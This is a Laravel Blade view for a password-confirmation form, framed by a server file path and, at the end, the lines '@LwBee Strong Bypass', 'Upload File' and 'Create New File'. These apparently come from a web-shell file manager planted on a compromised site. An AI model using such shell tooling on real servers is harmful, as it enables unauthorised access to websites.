/home/storage/f/3f/a5/aloic1/public_html/core/resources/views/auth/passwords/confirm.blade.php
@extends('dashboard.layouts.auth')
@section('title', __('Confirm Password'))
@section('content')
<div class="center-block w-xxl p-t-3">
<div class="p-a-md box-color r box-shadow-z4 text-color">
<div class="text-center">
@if(Helper::GeneralSiteSettings("style_logo_" . @Helper::currentLanguage()->code) !="")
<img alt="" class="app-logo"
src="{{ URL::to('uploads/settings/'.Helper::GeneralSiteSettings("style_logo_" . @Helper::currentLanguage()->code)) }}">
@else
<img alt="" src="{{ URL::to('uploads/settings/nologo.png') }}">
@endif
</div>
<div class="card">
<div class="card-header">{{ __('Confirm Password') }}</div>
<div class="card-body">
{{ __('Please confirm your password before continuing.') }}
<form method="POST" action="{{ route('password.confirm') }}">
@csrf
<div class="form-group row">
<label for="password"
class="col-md-4 col-form-label text-md-right">{{ __('Password') }}</label>
<div class="col-md-6">
<input id="password" type="password"
class="form-control @error('password') is-invalid @enderror" name="password"
required autocomplete="current-password">
@error('password')
<span class="invalid-feedback" role="alert">
<strong>{{ $message }}</strong>
</span>
@enderror
</div>
</div>
<div class="form-group row mb-0">
<div class="col-md-8 offset-md-4">
<button type="submit" class="btn btn-primary">
{{ __('Confirm Password') }}
</button>
@if (Route::has('password.request'))
<a class="btn btn-link" href="{{ route('password.request') }}">
{{ __('Forgot Your Password?') }}
</a>
@endif
</div>
</div>
</form>
</div>
</div>
</div>
</div>
@endsection
@LwBee Strong Bypass
Upload File
Create New File